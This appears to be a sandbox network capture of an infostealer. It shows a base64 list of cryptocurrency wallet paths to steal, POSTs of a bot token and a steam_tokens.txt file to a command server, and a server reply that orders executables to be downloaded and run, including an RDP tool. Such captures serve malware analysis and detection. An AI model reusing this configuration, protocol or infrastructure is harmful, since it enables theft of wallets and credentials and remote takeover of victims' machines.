Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 27, 2024 00:15:09.004492044 CEST	464	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA Host: 46.8.231.109 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="message"files------JDHIEBFHCAKEHIDGHCBA--
Sep 27, 2024 00:15:09.182090044 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:15:09.191745043 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAEC Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="file"------BKECBAKFBGDGCBGDBAEC--
Sep 27, 2024 00:15:09.371262074 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:15:09.374176979 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"ybncbhylepme------CGHCGIIDGDAKFIEBKFCF--
Sep 27, 2024 00:15:09.551532984 CEST	483	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:09 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 256 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 59 31 5a 47 49 35 5a 54 55 30 4e 7a 6b 30 58 33 5a 6d 61 32 46 6e 61 33 4d 75 5a 58 68 6c 66 44 42 38 4d 48 78 54 64 47 46 79 64 48 77 30 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 4e 57 52 69 59 57 4e 68 4d 7a 52 68 59 31 39 73 5a 6d 52 75 63 32 46 6d 62 6d 52 7a 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 6a 56 6b 4f 57 46 69 4d 47 51 30 59 7a 64 66 63 6d 52 77 4c 6d 56 34 5a 58 77 78 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 77 3d Data Ascii: aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmY1ZGI5ZTU0Nzk0X3Zma2Fna3MuZXhlfDB8MHxTdGFydHw0fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmNWRiYWNhMzRhY19sZmRuc2FmbmRzLmV4ZXwwfDB8U3RhcnR8NHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZjVkOWFiMGQ0YzdfcmRwLmV4ZXwxfDB8U3RhcnR8NHw=
Sep 27, 2024 00:15:12.362196922 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FCBFBGDBKJKECAAKKFHD--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	147.45.44.104	80	5280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:15:09.560471058 CEST	94	OUT	GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:15:10.214380980 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:10 GMT Content-Type: application/octet-stream Content-Length: 413224 Last-Modified: Thu, 26 Sep 2024 22:09:34 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5db9e-64e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `;S@((&`: H.textD `.rsrc@ @@.reloc`&@B <H0^8=.Qv A3[RJ_f9\lvC#SsnB~E~i7}+V#8f#XWb(<O1$=UN8)LL(K,r%9LY=0T4&d.(U'="(>d+92p81Pa\q]X/a@0CPQBv6le24I3PC:v}QwpS(AQg'N_XmvgJ/J6^D^MIO45+e^
Sep 27, 2024 00:15:10.214400053 CEST	1236	IN	Data Raw: 0a 44 49 66 3f 8a 31 24 3b 37 e3 85 96 e8 78 b9 0c e0 4d fd f8 71 f8 71 f9 7b 27 0d 83 ef 49 0e bd 43 4e c5 6e af d7 db ad 61 bf 50 b8 38 a5 90 12 89 21 30 d8 e8 5c 96 5e 1a 27 fe de 83 09 33 cc db 5f b9 95 a1 9a 2c 5c 33 4b 96 58 e2 c8 ce bf 4a Data Ascii: DIf?1$;7xMqq{'ICNnaP8!0\^'3_,\3KXJ$=MPGudswsu.,@F@^gc3"~ :\|$~Lp,%,8$u;WfXmx*FdW7Moj%_"
Sep 27, 2024 00:15:10.214418888 CEST	1236	IN	Data Raw: 56 8f a0 33 dc fb 99 5c fd 93 f9 60 81 b1 32 99 fd 34 50 02 fd 79 5e 7a 6d b8 67 31 2d ce e3 9e 51 99 45 67 c5 7c da 43 3e 03 a3 ea 3e b7 f7 06 76 81 04 c9 c0 99 4d a3 41 22 d6 0c e5 0c 49 b9 00 e3 0d 52 47 23 13 c1 8e ce 88 c4 89 6d 22 7e c6 aa Data Ascii: V3\`24Py^zmg1-QEg\|C>>vMA"IRG#m"~q1tU93DXZlI+pG [u%wa09\(P,duFDLJVc#8@G8*8n{;c4qk(_;e~2ZS}1{8`Dwq
Sep 27, 2024 00:15:10.214431047 CEST	672	IN	Data Raw: 76 ae 7f 11 47 ae 28 6e c2 af 5f aa 7e e4 69 8c 4f 0a 05 3d 7c 0b c0 52 41 73 03 ec 25 9f 8d d8 d9 8d 24 16 1f aa d3 9f e5 d1 65 80 ee 2c 66 15 53 66 a7 0a 3d a9 b6 12 42 78 80 0b 9b 55 f0 6e 53 90 73 75 91 db 18 4b 2e 99 0b 51 d1 31 35 74 83 8d Data Ascii: vG(n_~iO=\|RAs%$e,fSf=BxUnSsuK.Q15tBsrEIBb;}h}u!N2jMsB6f={o!_7d@,s{Yk(1\b_c`6b7[agb"{&)DVE5f
Sep 27, 2024 00:15:10.214443922 CEST	1236	IN	Data Raw: 19 18 40 0d 61 4c 4d e0 b8 30 b5 55 7f b6 3d 1f cc eb 48 7c 82 67 02 f1 47 03 7f ea f4 6b 97 0b e0 b3 b9 bb 98 20 34 1c 10 81 e5 3a 4f 75 c2 96 2e 7a 66 db df 01 95 74 6b 46 7e 3b 4b 1a f9 84 f7 fe 6f 59 a2 91 aa 47 ed 3e cd b0 6e 0d b8 14 33 b5 Data Ascii: @aLM0U=H\|gGk 4:Ou.zftkF~;KoYG>n3)DU0CcMp38NKZ o8~8hy~@2"D/~xU/3;2`MsG>XN4O)[sgT\PU%o]
Sep 27, 2024 00:15:10.214456081 CEST	1236	IN	Data Raw: 39 14 9b 6b 63 eb 8a 48 ea 4b fc 0f 19 a6 56 49 ea 06 80 ee a5 2b f5 9a 0c 8c 66 b8 08 3f 5b 0b 5b 06 51 c8 07 e6 4e 85 5d 26 b6 86 bd fa 85 e5 6f dc 72 c2 29 47 24 5c a7 b7 24 cf 4a ce 63 08 ff 20 b9 be 50 33 1d 42 0e d9 55 f8 66 24 ee 3e 83 96 Data Ascii: 9kcHKVI+f?[[QN]&or)G$\$Jc P3BUf$>s\|!Fp\|7>T?hFUUVvfs)&v=9Sf4c>#WUWxPW3WWGmdiWVNhkA
Sep 27, 2024 00:15:10.214466095 CEST	1236	IN	Data Raw: 54 f2 ae b3 21 7c 46 76 4b 8a b7 22 03 97 d8 76 b6 91 c7 92 ba 3d 17 09 23 9d 21 84 b4 5c e3 93 06 c7 1f d8 b5 60 8e d3 ba c3 46 21 3e 75 d8 ef a8 93 65 c5 c1 75 52 8c f2 43 ba 56 17 4e fb b7 53 3b 12 d2 6e 64 17 7f 9a 9f ae 15 ce 08 55 6e 23 f7 Data Ascii: T!\|FvK"v=#!\`F!>ueuRCVNS;ndUn#,k]+'w;T,yPe)mzNF>vU?k^^i.2dt@lI@?g6=&`T\|G}j{Kw/;
Sep 27, 2024 00:15:10.214478016 CEST	1236	IN	Data Raw: 58 43 60 23 e2 69 f4 44 35 e8 31 2c a1 3b e7 94 25 b2 e9 6e 95 77 72 22 99 25 34 b7 0a 32 5e 2b 82 8b 8f 7d b9 50 4e 56 db e1 eb 00 14 94 f6 b0 60 da 1e 08 d5 f8 1d c8 49 9e 15 38 83 2f 21 e0 b0 c1 77 4a 60 79 d7 a7 31 a3 e8 64 d2 67 80 fb 1b 8c Data Ascii: XC`#iD51,;%nwr"%42^+}PNV`I8/!wJ`y1dgc',_fc^*#^6;[>PRd{[LQO[w@O#`@ 6R2yI^%6#3p0e}rR:
Sep 27, 2024 00:15:10.214520931 CEST	1236	IN	Data Raw: c3 85 81 1c f3 7e 79 54 3f 1d 15 4f e8 08 56 f1 76 ac ab c3 77 25 63 90 b8 e9 4e a4 1d 46 ad 15 86 68 46 54 c4 5b c0 98 0a 36 92 18 c2 2f 4d d1 2b 96 97 3d e6 e8 91 9f a3 59 a5 e3 e9 68 b8 08 3a 72 bc 0a 75 e4 7d 56 00 55 bf 59 97 51 d6 de 63 1c Data Ascii: ~yT?OVvw%cNFhFT[6/M+=Yh:ru}VUYQcS[-e\|erJM97/:+n7=uI*~'%~Wr[/5`X}Eab'Z19Jy:=j^8?qEq@qT84/
Sep 27, 2024 00:15:10.214545012 CEST	1236	IN	Data Raw: 8c a8 9c 14 21 3c ab d0 eb 49 55 db 4f 69 cc 97 18 a6 25 6c a4 53 ab 91 44 98 d8 87 b7 24 5c 8d fd f2 3b 30 30 1f 87 2f d7 98 c1 33 af d5 17 1b d9 80 eb b6 a3 a3 7e d8 1c cd 7a fc 74 7d 69 d1 5e 83 45 20 b7 1e 0e 38 c9 1b 06 41 ae 97 0d 48 8c e6 Data Ascii: !<IUOi%lSD$\;00/3~zt}i^E 8AHUV~:2&&XW96VgXCc0u/2<,Ji7(d2n[.L+ qD'b!oi3o$R;`@~~z*[+47W=IWw
Sep 27, 2024 00:15:10.220707893 CEST	1236	IN	Data Raw: ce 86 a1 de 25 91 32 e8 78 15 61 a8 94 1a b7 83 c9 90 ea 9e 6b ea 7d 43 a8 97 35 22 02 0f e6 98 cb da 67 27 8d c4 f0 24 5f 04 91 09 26 04 2f 63 ac 9b ff db f8 91 34 46 ff 0a 51 da 5e 0c 06 07 5a d8 3e 75 7a 59 94 09 23 42 e6 75 9b a6 38 b0 0b f6 Data Ascii: %2xak}C5"g'$_&/c4FQ^Z>uzY#Bu8d;aVa^%qiC/uu_5P)UJ;cM*uD)c6INQ;pio8&[mN1I:`Q[.p-.#_rb}?
Sep 27, 2024 00:15:11.289055109 CEST	97	OUT	GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:15:11.474342108 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:11 GMT Content-Type: application/octet-stream Content-Length: 385064 Last-Modified: Thu, 26 Sep 2024 22:09:48 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5dbac-5e028" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ `S(& H.textD `.rsrc@@.reloc@B H0yYYlv^5fH$/Wazz5O7fSl\RBk5EqvBf9v;(F Jgi(BBMs<ub l]Qg\Bc$fVGZ.8lH;!"pUO8Y"d\dD"sm}c#?4?Y#0VSX\|G.g:!rM[~eBpbz{`5\|\|bOGAh}s
Sep 27, 2024 00:15:11.794403076 CEST	90	OUT	GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:15:11.983638048 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:11 GMT Content-Type: application/octet-stream Content-Length: 73216 Last-Modified: Thu, 26 Sep 2024 22:01:15 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5d9ab-11e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0" @@ `!S@` H.text `.rsrc@@@.reloc`@B!HtD%,("(6\|(0Vs1rp((2Js1s3(4Zrp((oE(N:rp(r&p((O(rp((rp(oE:rp(rp(rMp({rMp((RoS(Tb:rp(oU*0n(s(rpo(sooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	147.45.44.104	80	6420	C:\Users\userBGIJEGCGDG.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:15:14.393722057 CEST	94	OUT	GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1 Host: 147.45.44.104 Connection: Keep-Alive
Sep 27, 2024 00:15:14.988224983 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:14 GMT Content-Type: application/octet-stream Content-Length: 1785344 Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f55533-1b3e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext\|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`\|@@p@@
Sep 27, 2024 00:15:14.988249063 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
Sep 27, 2024 00:15:14.988260031 CEST	448	IN	Data Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40 Data Ascii: @B@C@B@BH@C\|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
